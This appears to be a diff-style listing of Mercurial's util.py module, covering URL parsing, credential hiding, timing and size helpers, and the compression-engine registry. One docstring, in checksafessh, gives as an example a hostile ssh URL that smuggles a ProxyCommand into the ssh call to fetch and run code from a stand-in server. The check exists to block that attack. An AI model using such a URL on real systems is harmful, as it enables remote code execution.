2919 self._localpath = False
2922
2920
2923 if not path:
2921 if not path:
2924 path = None
2922 path = None
2925 if self._localpath:
2923 if self._localpath:
2926 self.path = ''
2924 self.path = ''
2927 return
2925 return
2928 else:
2926 else:
2929 if self._localpath:
2927 if self._localpath:
2930 self.path = path
2928 self.path = path
2931 return
2929 return
2932
2930
2933 if parsequery and '?' in path:
2931 if parsequery and '?' in path:
2934 path, self.query = path.split('?', 1)
2932 path, self.query = path.split('?', 1)
2935 if not path:
2933 if not path:
2936 path = None
2934 path = None
2937 if not self.query:
2935 if not self.query:
2938 self.query = None
2936 self.query = None
2939
2937
2940 # // is required to specify a host/authority
2938 # // is required to specify a host/authority
2941 if path and path.startswith('//'):
2939 if path and path.startswith('//'):
2942 parts = path[2:].split('/', 1)
2940 parts = path[2:].split('/', 1)
2943 if len(parts) > 1:
2941 if len(parts) > 1:
2944 self.host, path = parts
2942 self.host, path = parts
2945 else:
2943 else:
2946 self.host = parts[0]
2944 self.host = parts[0]
2947 path = None
2945 path = None
2948 if not self.host:
2946 if not self.host:
2949 self.host = None
2947 self.host = None
2950 # path of file:///d is /d
2948 # path of file:///d is /d
2951 # path of file:///d:/ is d:/, not /d:/
2949 # path of file:///d:/ is d:/, not /d:/
2952 if path and not hasdriveletter(path):
2950 if path and not hasdriveletter(path):
2953 path = '/' + path
2951 path = '/' + path
2954
2952
2955 if self.host and '@' in self.host:
2953 if self.host and '@' in self.host:
2956 self.user, self.host = self.host.rsplit('@', 1)
2954 self.user, self.host = self.host.rsplit('@', 1)
2957 if ':' in self.user:
2955 if ':' in self.user:
2958 self.user, self.passwd = self.user.split(':', 1)
2956 self.user, self.passwd = self.user.split(':', 1)
2959 if not self.host:
2957 if not self.host:
2960 self.host = None
2958 self.host = None
2961
2959
2962 # Don't split on colons in IPv6 addresses without ports
2960 # Don't split on colons in IPv6 addresses without ports
2963 if (self.host and ':' in self.host and
2961 if (self.host and ':' in self.host and
2964 not (self.host.startswith('[') and self.host.endswith(']'))):
2962 not (self.host.startswith('[') and self.host.endswith(']'))):
2965 self._hostport = self.host
2963 self._hostport = self.host
2966 self.host, self.port = self.host.rsplit(':', 1)
2964 self.host, self.port = self.host.rsplit(':', 1)
2967 if not self.host:
2965 if not self.host:
2968 self.host = None
2966 self.host = None
2969
2967
2970 if (self.host and self.scheme == 'file' and
2968 if (self.host and self.scheme == 'file' and
2971 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2969 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2972 raise error.Abort(_('file:// URLs can only refer to localhost'))
2970 raise error.Abort(_('file:// URLs can only refer to localhost'))
2973
2971
2974 self.path = path
2972 self.path = path
2975
2973
2976 # leave the query string escaped
2974 # leave the query string escaped
2977 for a in ('user', 'passwd', 'host', 'port',
2975 for a in ('user', 'passwd', 'host', 'port',
2978 'path', 'fragment'):
2976 'path', 'fragment'):
2979 v = getattr(self, a)
2977 v = getattr(self, a)
2980 if v is not None:
2978 if v is not None:
2981 setattr(self, a, urlreq.unquote(v))
2979 setattr(self, a, urlreq.unquote(v))
2982
2980
2983 @encoding.strmethod
2981 @encoding.strmethod
2984 def __repr__(self):
2982 def __repr__(self):
2985 attrs = []
2983 attrs = []
2986 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2984 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2987 'query', 'fragment'):
2985 'query', 'fragment'):
2988 v = getattr(self, a)
2986 v = getattr(self, a)
2989 if v is not None:
2987 if v is not None:
2990 attrs.append('%s: %r' % (a, v))
2988 attrs.append('%s: %r' % (a, v))
2991 return '<url %s>' % ', '.join(attrs)
2989 return '<url %s>' % ', '.join(attrs)
2992
2990
2993 def __bytes__(self):
2991 def __bytes__(self):
2994 r"""Join the URL's components back into a URL string.
2992 r"""Join the URL's components back into a URL string.
2995
2993
2996 Examples:
2994 Examples:
2997
2995
2998 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2996 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2999 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2997 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
3000 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2998 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
3001 'http://user:pw@host:80/?foo=bar&baz=42'
2999 'http://user:pw@host:80/?foo=bar&baz=42'
3002 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
3000 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
3003 'http://user:pw@host:80/?foo=bar%3dbaz'
3001 'http://user:pw@host:80/?foo=bar%3dbaz'
3004 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
3002 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
3005 'ssh://user:pw@[::1]:2200//home/joe#'
3003 'ssh://user:pw@[::1]:2200//home/joe#'
3006 >>> bytes(url(b'http://localhost:80//'))
3004 >>> bytes(url(b'http://localhost:80//'))
3007 'http://localhost:80//'
3005 'http://localhost:80//'
3008 >>> bytes(url(b'http://localhost:80/'))
3006 >>> bytes(url(b'http://localhost:80/'))
3009 'http://localhost:80/'
3007 'http://localhost:80/'
3010 >>> bytes(url(b'http://localhost:80'))
3008 >>> bytes(url(b'http://localhost:80'))
3011 'http://localhost:80/'
3009 'http://localhost:80/'
3012 >>> bytes(url(b'bundle:foo'))
3010 >>> bytes(url(b'bundle:foo'))
3013 'bundle:foo'
3011 'bundle:foo'
3014 >>> bytes(url(b'bundle://../foo'))
3012 >>> bytes(url(b'bundle://../foo'))
3015 'bundle:../foo'
3013 'bundle:../foo'
3016 >>> bytes(url(b'path'))
3014 >>> bytes(url(b'path'))
3017 'path'
3015 'path'
3018 >>> bytes(url(b'file:///tmp/foo/bar'))
3016 >>> bytes(url(b'file:///tmp/foo/bar'))
3019 'file:///tmp/foo/bar'
3017 'file:///tmp/foo/bar'
3020 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
3018 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
3021 'file:///c:/tmp/foo/bar'
3019 'file:///c:/tmp/foo/bar'
3022 >>> print(url(br'bundle:foo\bar'))
3020 >>> print(url(br'bundle:foo\bar'))
3023 bundle:foo\bar
3021 bundle:foo\bar
3024 >>> print(url(br'file:///D:\data\hg'))
3022 >>> print(url(br'file:///D:\data\hg'))
3025 file:///D:\data\hg
3023 file:///D:\data\hg
3026 """
3024 """
3027 if self._localpath:
3025 if self._localpath:
3028 s = self.path
3026 s = self.path
3029 if self.scheme == 'bundle':
3027 if self.scheme == 'bundle':
3030 s = 'bundle:' + s
3028 s = 'bundle:' + s
3031 if self.fragment:
3029 if self.fragment:
3032 s += '#' + self.fragment
3030 s += '#' + self.fragment
3033 return s
3031 return s
3034
3032
3035 s = self.scheme + ':'
3033 s = self.scheme + ':'
3036 if self.user or self.passwd or self.host:
3034 if self.user or self.passwd or self.host:
3037 s += '//'
3035 s += '//'
3038 elif self.scheme and (not self.path or self.path.startswith('/')
3036 elif self.scheme and (not self.path or self.path.startswith('/')
3039 or hasdriveletter(self.path)):
3037 or hasdriveletter(self.path)):
3040 s += '//'
3038 s += '//'
3041 if hasdriveletter(self.path):
3039 if hasdriveletter(self.path):
3042 s += '/'
3040 s += '/'
3043 if self.user:
3041 if self.user:
3044 s += urlreq.quote(self.user, safe=self._safechars)
3042 s += urlreq.quote(self.user, safe=self._safechars)
3045 if self.passwd:
3043 if self.passwd:
3046 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
3044 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
3047 if self.user or self.passwd:
3045 if self.user or self.passwd:
3048 s += '@'
3046 s += '@'
3049 if self.host:
3047 if self.host:
3050 if not (self.host.startswith('[') and self.host.endswith(']')):
3048 if not (self.host.startswith('[') and self.host.endswith(']')):
3051 s += urlreq.quote(self.host)
3049 s += urlreq.quote(self.host)
3052 else:
3050 else:
3053 s += self.host
3051 s += self.host
3054 if self.port:
3052 if self.port:
3055 s += ':' + urlreq.quote(self.port)
3053 s += ':' + urlreq.quote(self.port)
3056 if self.host:
3054 if self.host:
3057 s += '/'
3055 s += '/'
3058 if self.path:
3056 if self.path:
3059 # TODO: similar to the query string, we should not unescape the
3057 # TODO: similar to the query string, we should not unescape the
3060 # path when we store it, the path might contain '%2f' = '/',
3058 # path when we store it, the path might contain '%2f' = '/',
3061 # which we should *not* escape.
3059 # which we should *not* escape.
3062 s += urlreq.quote(self.path, safe=self._safepchars)
3060 s += urlreq.quote(self.path, safe=self._safepchars)
3063 if self.query:
3061 if self.query:
3064 # we store the query in escaped form.
3062 # we store the query in escaped form.
3065 s += '?' + self.query
3063 s += '?' + self.query
3066 if self.fragment is not None:
3064 if self.fragment is not None:
3067 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
3065 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
3068 return s
3066 return s
3069
3067
3070 __str__ = encoding.strmethod(__bytes__)
3068 __str__ = encoding.strmethod(__bytes__)
3071
3069
3072 def authinfo(self):
3070 def authinfo(self):
3073 user, passwd = self.user, self.passwd
3071 user, passwd = self.user, self.passwd
3074 try:
3072 try:
3075 self.user, self.passwd = None, None
3073 self.user, self.passwd = None, None
3076 s = bytes(self)
3074 s = bytes(self)
3077 finally:
3075 finally:
3078 self.user, self.passwd = user, passwd
3076 self.user, self.passwd = user, passwd
3079 if not self.user:
3077 if not self.user:
3080 return (s, None)
3078 return (s, None)
3081 # authinfo[1] is passed to urllib2 password manager, and its
3079 # authinfo[1] is passed to urllib2 password manager, and its
3082 # URIs must not contain credentials. The host is passed in the
3080 # URIs must not contain credentials. The host is passed in the
3083 # URIs list because Python < 2.4.3 uses only that to search for
3081 # URIs list because Python < 2.4.3 uses only that to search for
3084 # a password.
3082 # a password.
3085 return (s, (None, (s, self.host),
3083 return (s, (None, (s, self.host),
3086 self.user, self.passwd or ''))
3084 self.user, self.passwd or ''))
3087
3085
3088 def isabs(self):
3086 def isabs(self):
3089 if self.scheme and self.scheme != 'file':
3087 if self.scheme and self.scheme != 'file':
3090 return True # remote URL
3088 return True # remote URL
3091 if hasdriveletter(self.path):
3089 if hasdriveletter(self.path):
3092 return True # absolute for our purposes - can't be joined()
3090 return True # absolute for our purposes - can't be joined()
3093 if self.path.startswith(br'\\'):
3091 if self.path.startswith(br'\\'):
3094 return True # Windows UNC path
3092 return True # Windows UNC path
3095 if self.path.startswith('/'):
3093 if self.path.startswith('/'):
3096 return True # POSIX-style
3094 return True # POSIX-style
3097 return False
3095 return False
3098
3096
3099 def localpath(self):
3097 def localpath(self):
3100 if self.scheme == 'file' or self.scheme == 'bundle':
3098 if self.scheme == 'file' or self.scheme == 'bundle':
3101 path = self.path or '/'
3099 path = self.path or '/'
3102 # For Windows, we need to promote hosts containing drive
3100 # For Windows, we need to promote hosts containing drive
3103 # letters to paths with drive letters.
3101 # letters to paths with drive letters.
3104 if hasdriveletter(self._hostport):
3102 if hasdriveletter(self._hostport):
3105 path = self._hostport + '/' + self.path
3103 path = self._hostport + '/' + self.path
3106 elif (self.host is not None and self.path
3104 elif (self.host is not None and self.path
3107 and not hasdriveletter(path)):
3105 and not hasdriveletter(path)):
3108 path = '/' + path
3106 path = '/' + path
3109 return path
3107 return path
3110 return self._origpath
3108 return self._origpath
3111
3109
3112 def islocal(self):
3110 def islocal(self):
3113 '''whether localpath will return something that posixfile can open'''
3111 '''whether localpath will return something that posixfile can open'''
3114 return (not self.scheme or self.scheme == 'file'
3112 return (not self.scheme or self.scheme == 'file'
3115 or self.scheme == 'bundle')
3113 or self.scheme == 'bundle')
3116
3114
3117 def hasscheme(path):
3115 def hasscheme(path):
3118 return bool(url(path).scheme)
3116 return bool(url(path).scheme)
3119
3117
3120 def hasdriveletter(path):
3118 def hasdriveletter(path):
3121 return path and path[1:2] == ':' and path[0:1].isalpha()
3119 return path and path[1:2] == ':' and path[0:1].isalpha()
3122
3120
3123 def urllocalpath(path):
3121 def urllocalpath(path):
3124 return url(path, parsequery=False, parsefragment=False).localpath()
3122 return url(path, parsequery=False, parsefragment=False).localpath()
3125
3123
3126 def checksafessh(path):
3124 def checksafessh(path):
3127 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3125 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3128
3126
3129 This is a sanity check for ssh urls. ssh will parse the first item as
3127 This is a sanity check for ssh urls. ssh will parse the first item as
3130 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3128 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3131 Let's prevent these potentially exploited urls entirely and warn the
3129 Let's prevent these potentially exploited urls entirely and warn the
3132 user.
3130 user.
3133
3131
3134 Raises an error.Abort when the url is unsafe.
3132 Raises an error.Abort when the url is unsafe.
3135 """
3133 """
3136 path = urlreq.unquote(path)
3134 path = urlreq.unquote(path)
3137 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3135 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3138 raise error.Abort(_('potentially unsafe url: %r') %
3136 raise error.Abort(_('potentially unsafe url: %r') %
3139 (pycompat.bytestr(path),))
3137 (pycompat.bytestr(path),))
3140
3138
3141 def hidepassword(u):
3139 def hidepassword(u):
3142 '''hide user credential in a url string'''
3140 '''hide user credential in a url string'''
3143 u = url(u)
3141 u = url(u)
3144 if u.passwd:
3142 if u.passwd:
3145 u.passwd = '***'
3143 u.passwd = '***'
3146 return bytes(u)
3144 return bytes(u)
3147
3145
3148 def removeauth(u):
3146 def removeauth(u):
3149 '''remove all authentication information from a url string'''
3147 '''remove all authentication information from a url string'''
3150 u = url(u)
3148 u = url(u)
3151 u.user = u.passwd = None
3149 u.user = u.passwd = None
3152 return str(u)
3150 return str(u)
3153
3151
3154 timecount = unitcountfn(
3152 timecount = unitcountfn(
3155 (1, 1e3, _('%.0f s')),
3153 (1, 1e3, _('%.0f s')),
3156 (100, 1, _('%.1f s')),
3154 (100, 1, _('%.1f s')),
3157 (10, 1, _('%.2f s')),
3155 (10, 1, _('%.2f s')),
3158 (1, 1, _('%.3f s')),
3156 (1, 1, _('%.3f s')),
3159 (100, 0.001, _('%.1f ms')),
3157 (100, 0.001, _('%.1f ms')),
3160 (10, 0.001, _('%.2f ms')),
3158 (10, 0.001, _('%.2f ms')),
3161 (1, 0.001, _('%.3f ms')),
3159 (1, 0.001, _('%.3f ms')),
3162 (100, 0.000001, _('%.1f us')),
3160 (100, 0.000001, _('%.1f us')),
3163 (10, 0.000001, _('%.2f us')),
3161 (10, 0.000001, _('%.2f us')),
3164 (1, 0.000001, _('%.3f us')),
3162 (1, 0.000001, _('%.3f us')),
3165 (100, 0.000000001, _('%.1f ns')),
3163 (100, 0.000000001, _('%.1f ns')),
3166 (10, 0.000000001, _('%.2f ns')),
3164 (10, 0.000000001, _('%.2f ns')),
3167 (1, 0.000000001, _('%.3f ns')),
3165 (1, 0.000000001, _('%.3f ns')),
3168 )
3166 )
3169
3167
3170 _timenesting = [0]
3168 _timenesting = [0]
3171
3169
3172 def timed(func):
3170 def timed(func):
3173 '''Report the execution time of a function call to stderr.
3171 '''Report the execution time of a function call to stderr.
3174
3172
3175 During development, use as a decorator when you need to measure
3173 During development, use as a decorator when you need to measure
3176 the cost of a function, e.g. as follows:
3174 the cost of a function, e.g. as follows:
3177
3175
3178 @util.timed
3176 @util.timed
3179 def foo(a, b, c):
3177 def foo(a, b, c):
3180 pass
3178 pass
3181 '''
3179 '''
3182
3180
3183 def wrapper(*args, **kwargs):
3181 def wrapper(*args, **kwargs):
3184 start = timer()
3182 start = timer()
3185 indent = 2
3183 indent = 2
3186 _timenesting[0] += indent
3184 _timenesting[0] += indent
3187 try:
3185 try:
3188 return func(*args, **kwargs)
3186 return func(*args, **kwargs)
3189 finally:
3187 finally:
3190 elapsed = timer() - start
3188 elapsed = timer() - start
3191 _timenesting[0] -= indent
3189 _timenesting[0] -= indent
3192 stderr.write('%s%s: %s\n' %
3190 stderr.write('%s%s: %s\n' %
3193 (' ' * _timenesting[0], func.__name__,
3191 (' ' * _timenesting[0], func.__name__,
3194 timecount(elapsed)))
3192 timecount(elapsed)))
3195 return wrapper
3193 return wrapper
3196
3194
3197 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3195 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3198 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3196 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3199
3197
3200 def sizetoint(s):
3198 def sizetoint(s):
3201 '''Convert a space specifier to a byte count.
3199 '''Convert a space specifier to a byte count.
3202
3200
3203 >>> sizetoint(b'30')
3201 >>> sizetoint(b'30')
3204 30
3202 30
3205 >>> sizetoint(b'2.2kb')
3203 >>> sizetoint(b'2.2kb')
3206 2252
3204 2252
3207 >>> sizetoint(b'6M')
3205 >>> sizetoint(b'6M')
3208 6291456
3206 6291456
3209 '''
3207 '''
3210 t = s.strip().lower()
3208 t = s.strip().lower()
3211 try:
3209 try:
3212 for k, u in _sizeunits:
3210 for k, u in _sizeunits:
3213 if t.endswith(k):
3211 if t.endswith(k):
3214 return int(float(t[:-len(k)]) * u)
3212 return int(float(t[:-len(k)]) * u)
3215 return int(t)
3213 return int(t)
3216 except ValueError:
3214 except ValueError:
3217 raise error.ParseError(_("couldn't parse size: %s") % s)
3215 raise error.ParseError(_("couldn't parse size: %s") % s)
3218
3216
3219 class hooks(object):
3217 class hooks(object):
3220 '''A collection of hook functions that can be used to extend a
3218 '''A collection of hook functions that can be used to extend a
3221 function's behavior. Hooks are called in lexicographic order,
3219 function's behavior. Hooks are called in lexicographic order,
3222 based on the names of their sources.'''
3220 based on the names of their sources.'''
3223
3221
3224 def __init__(self):
3222 def __init__(self):
3225 self._hooks = []
3223 self._hooks = []
3226
3224
3227 def add(self, source, hook):
3225 def add(self, source, hook):
3228 self._hooks.append((source, hook))
3226 self._hooks.append((source, hook))
3229
3227
3230 def __call__(self, *args):
3228 def __call__(self, *args):
3231 self._hooks.sort(key=lambda x: x[0])
3229 self._hooks.sort(key=lambda x: x[0])
3232 results = []
3230 results = []
3233 for source, hook in self._hooks:
3231 for source, hook in self._hooks:
3234 results.append(hook(*args))
3232 results.append(hook(*args))
3235 return results
3233 return results
3236
3234
3237 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3235 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3238 '''Yields lines for a nicely formatted stacktrace.
3236 '''Yields lines for a nicely formatted stacktrace.
3239 Skips the 'skip' last entries, then return the last 'depth' entries.
3237 Skips the 'skip' last entries, then return the last 'depth' entries.
3240 Each file+linenumber is formatted according to fileline.
3238 Each file+linenumber is formatted according to fileline.
3241 Each line is formatted according to line.
3239 Each line is formatted according to line.
3242 If line is None, it yields:
3240 If line is None, it yields:
3243 length of longest filepath+line number,
3241 length of longest filepath+line number,
3244 filepath+linenumber,
3242 filepath+linenumber,
3245 function
3243 function
3246
3244
3247 Not be used in production code but very convenient while developing.
3245 Not be used in production code but very convenient while developing.
3248 '''
3246 '''
3249 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3247 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3250 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3248 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3251 ][-depth:]
3249 ][-depth:]
3252 if entries:
3250 if entries:
3253 fnmax = max(len(entry[0]) for entry in entries)
3251 fnmax = max(len(entry[0]) for entry in entries)
3254 for fnln, func in entries:
3252 for fnln, func in entries:
3255 if line is None:
3253 if line is None:
3256 yield (fnmax, fnln, func)
3254 yield (fnmax, fnln, func)
3257 else:
3255 else:
3258 yield line % (fnmax, fnln, func)
3256 yield line % (fnmax, fnln, func)
3259
3257
3260 def debugstacktrace(msg='stacktrace', skip=0,
3258 def debugstacktrace(msg='stacktrace', skip=0,
3261 f=stderr, otherf=stdout, depth=0):
3259 f=stderr, otherf=stdout, depth=0):
3262 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3260 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3263 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3261 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3264 By default it will flush stdout first.
3262 By default it will flush stdout first.
3265 It can be used everywhere and intentionally does not require an ui object.
3263 It can be used everywhere and intentionally does not require an ui object.
3266 Not be used in production code but very convenient while developing.
3264 Not be used in production code but very convenient while developing.
3267 '''
3265 '''
3268 if otherf:
3266 if otherf:
3269 otherf.flush()
3267 otherf.flush()
3270 f.write('%s at:\n' % msg.rstrip())
3268 f.write('%s at:\n' % msg.rstrip())
3271 for line in getstackframes(skip + 1, depth=depth):
3269 for line in getstackframes(skip + 1, depth=depth):
3272 f.write(line)
3270 f.write(line)
3273 f.flush()
3271 f.flush()
3274
3272
3275 class dirs(object):
3273 class dirs(object):
3276 '''a multiset of directory names from a dirstate or manifest'''
3274 '''a multiset of directory names from a dirstate or manifest'''
3277
3275
3278 def __init__(self, map, skip=None):
3276 def __init__(self, map, skip=None):
3279 self._dirs = {}
3277 self._dirs = {}
3280 addpath = self.addpath
3278 addpath = self.addpath
3281 if safehasattr(map, 'iteritems') and skip is not None:
3279 if safehasattr(map, 'iteritems') and skip is not None:
3282 for f, s in map.iteritems():
3280 for f, s in map.iteritems():
3283 if s[0] != skip:
3281 if s[0] != skip:
3284 addpath(f)
3282 addpath(f)
3285 else:
3283 else:
3286 for f in map:
3284 for f in map:
3287 addpath(f)
3285 addpath(f)
3288
3286
3289 def addpath(self, path):
3287 def addpath(self, path):
3290 dirs = self._dirs
3288 dirs = self._dirs
3291 for base in finddirs(path):
3289 for base in finddirs(path):
3292 if base in dirs:
3290 if base in dirs:
3293 dirs[base] += 1
3291 dirs[base] += 1
3294 return
3292 return
3295 dirs[base] = 1
3293 dirs[base] = 1
3296
3294
3297 def delpath(self, path):
3295 def delpath(self, path):
3298 dirs = self._dirs
3296 dirs = self._dirs
3299 for base in finddirs(path):
3297 for base in finddirs(path):
3300 if dirs[base] > 1:
3298 if dirs[base] > 1:
3301 dirs[base] -= 1
3299 dirs[base] -= 1
3302 return
3300 return
3303 del dirs[base]
3301 del dirs[base]
3304
3302
3305 def __iter__(self):
3303 def __iter__(self):
3306 return iter(self._dirs)
3304 return iter(self._dirs)
3307
3305
3308 def __contains__(self, d):
3306 def __contains__(self, d):
3309 return d in self._dirs
3307 return d in self._dirs
3310
3308
3311 if safehasattr(parsers, 'dirs'):
3309 if safehasattr(parsers, 'dirs'):
3312 dirs = parsers.dirs
3310 dirs = parsers.dirs
3313
3311
3314 def finddirs(path):
3312 def finddirs(path):
3315 pos = path.rfind('/')
3313 pos = path.rfind('/')
3316 while pos != -1:
3314 while pos != -1:
3317 yield path[:pos]
3315 yield path[:pos]
3318 pos = path.rfind('/', 0, pos)
3316 pos = path.rfind('/', 0, pos)
3319
3317
3320 # compression code
3318 # compression code
3321
3319
3322 SERVERROLE = 'server'
3320 SERVERROLE = 'server'
3323 CLIENTROLE = 'client'
3321 CLIENTROLE = 'client'
3324
3322
3325 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3323 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3326 (u'name', u'serverpriority',
3324 (u'name', u'serverpriority',
3327 u'clientpriority'))
3325 u'clientpriority'))
3328
3326
3329 class compressormanager(object):
3327 class compressormanager(object):
3330 """Holds registrations of various compression engines.
3328 """Holds registrations of various compression engines.
3331
3329
3332 This class essentially abstracts the differences between compression
3330 This class essentially abstracts the differences between compression
3333 engines to allow new compression formats to be added easily, possibly from
3331 engines to allow new compression formats to be added easily, possibly from
3334 extensions.
3332 extensions.
3335
3333
3336 Compressors are registered against the global instance by calling its
3334 Compressors are registered against the global instance by calling its
3337 ``register()`` method.
3335 ``register()`` method.
3338 """
3336 """
3339 def __init__(self):
3337 def __init__(self):
3340 self._engines = {}
3338 self._engines = {}
3341 # Bundle spec human name to engine name.
3339 # Bundle spec human name to engine name.
3342 self._bundlenames = {}
3340 self._bundlenames = {}
3343 # Internal bundle identifier to engine name.
3341 # Internal bundle identifier to engine name.
3344 self._bundletypes = {}
3342 self._bundletypes = {}
3345 # Revlog header to engine name.
3343 # Revlog header to engine name.
3346 self._revlogheaders = {}
3344 self._revlogheaders = {}
3347 # Wire proto identifier to engine name.
3345 # Wire proto identifier to engine name.
3348 self._wiretypes = {}
3346 self._wiretypes = {}
3349
3347
3350 def __getitem__(self, key):
3348 def __getitem__(self, key):
3351 return self._engines[key]
3349 return self._engines[key]
3352
3350
3353 def __contains__(self, key):
3351 def __contains__(self, key):
3354 return key in self._engines
3352 return key in self._engines
3355
3353
3356 def __iter__(self):
3354 def __iter__(self):
3357 return iter(self._engines.keys())
3355 return iter(self._engines.keys())
3358
3356
3359 def register(self, engine):
3357 def register(self, engine):
3360 """Register a compression engine with the manager.
3358 """Register a compression engine with the manager.
3361
3359
3362 The argument must be a ``compressionengine`` instance.
3360 The argument must be a ``compressionengine`` instance.
3363 """
3361 """
3364 if not isinstance(engine, compressionengine):
3362 if not isinstance(engine, compressionengine):
3365 raise ValueError(_('argument must be a compressionengine'))
3363 raise ValueError(_('argument must be a compressionengine'))
3366
3364
3367 name = engine.name()
3365 name = engine.name()
3368
3366
3369 if name in self._engines:
3367 if name in self._engines:
3370 raise error.Abort(_('compression engine %s already registered') %
3368 raise error.Abort(_('compression engine %s already registered') %
3371 name)
3369 name)
3372
3370
3373 bundleinfo = engine.bundletype()
3371 bundleinfo = engine.bundletype()
3374 if bundleinfo:
3372 if bundleinfo:
3375 bundlename, bundletype = bundleinfo
3373 bundlename, bundletype = bundleinfo
3376
3374
3377 if bundlename in self._bundlenames:
3375 if bundlename in self._bundlenames:
3378 raise error.Abort(_('bundle name %s already registered') %
3376 raise error.Abort(_('bundle name %s already registered') %
3379 bundlename)
3377 bundlename)
3380 if bundletype in self._bundletypes:
3378 if bundletype in self._bundletypes:
3381 raise error.Abort(_('bundle type %s already registered by %s') %
3379 raise error.Abort(_('bundle type %s already registered by %s') %
3382 (bundletype, self._bundletypes[bundletype]))
3380 (bundletype, self._bundletypes[bundletype]))
3383
3381
3384 # No external facing name declared.
3382 # No external facing name declared.
3385 if bundlename:
3383 if bundlename:
3386 self._bundlenames[bundlename] = name
3384 self._bundlenames[bundlename] = name
3387
3385
3388 self._bundletypes[bundletype] = name
3386 self._bundletypes[bundletype] = name
3389
3387
3390 wiresupport = engine.wireprotosupport()
3388 wiresupport = engine.wireprotosupport()
3391 if wiresupport:
3389 if wiresupport:
3392 wiretype = wiresupport.name
3390 wiretype = wiresupport.name
3393 if wiretype in self._wiretypes:
3391 if wiretype in self._wiretypes:
3394 raise error.Abort(_('wire protocol compression %s already '
3392 raise error.Abort(_('wire protocol compression %s already '
3395 'registered by %s') %
3393 'registered by %s') %
3396 (wiretype, self._wiretypes[wiretype]))
3394 (wiretype, self._wiretypes[wiretype]))
3397
3395
3398 self._wiretypes[wiretype] = name
3396 self._wiretypes[wiretype] = name
3399
3397
3400 revlogheader = engine.revlogheader()
3398 revlogheader = engine.revlogheader()
3401 if revlogheader and revlogheader in self._revlogheaders:
3399 if revlogheader and revlogheader in self._revlogheaders:
3402 raise error.Abort(_('revlog header %s already registered by %s') %
3400 raise error.Abort(_('revlog header %s already registered by %s') %
3403 (revlogheader, self._revlogheaders[revlogheader]))
3401 (revlogheader, self._revlogheaders[revlogheader]))
3404
3402
3405 if revlogheader:
3403 if revlogheader:
3406 self._revlogheaders[revlogheader] = name
3404 self._revlogheaders[revlogheader] = name
3407
3405
3408 self._engines[name] = engine
3406 self._engines[name] = engine
3409
3407
3410 @property
3408 @property
3411 def supportedbundlenames(self):
3409 def supportedbundlenames(self):
3412 return set(self._bundlenames.keys())
3410 return set(self._bundlenames.keys())
3413
3411
3414 @property
3412 @property
3415 def supportedbundletypes(self):
3413 def supportedbundletypes(self):
3416 return set(self._bundletypes.keys())
3414 return set(self._bundletypes.keys())
3417
3415
3418 def forbundlename(self, bundlename):
3416 def forbundlename(self, bundlename):
3419 """Obtain a compression engine registered to a bundle name.
3417 """Obtain a compression engine registered to a bundle name.
3420
3418
3421 Will raise KeyError if the bundle type isn't registered.
3419 Will raise KeyError if the bundle type isn't registered.
3422
3420
3423 Will abort if the engine is known but not available.
3421 Will abort if the engine is known but not available.
3424 """
3422 """
3425 engine = self._engines[self._bundlenames[bundlename]]
3423 engine = self._engines[self._bundlenames[bundlename]]
3426 if not engine.available():
3424 if not engine.available():
3427 raise error.Abort(_('compression engine %s could not be loaded') %
3425 raise error.Abort(_('compression engine %s could not be loaded') %
3428 engine.name())
3426 engine.name())
3429 return engine
3427 return engine
3430
3428
3431 def forbundletype(self, bundletype):
3429 def forbundletype(self, bundletype):
3432 """Obtain a compression engine registered to a bundle type.
3430 """Obtain a compression engine registered to a bundle type.
3433
3431
3434 Will raise KeyError if the bundle type isn't registered.
3432 Will raise KeyError if the bundle type isn't registered.
3435
3433
3436 Will abort if the engine is known but not available.
3434 Will abort if the engine is known but not available.
3437 """
3435 """
3438 engine = self._engines[self._bundletypes[bundletype]]
3436 engine = self._engines[self._bundletypes[bundletype]]
3439 if not engine.available():
3437 if not engine.available():
3440 raise error.Abort(_('compression engine %s could not be loaded') %
3438 raise error.Abort(_('compression engine %s could not be loaded') %
3441 engine.name())
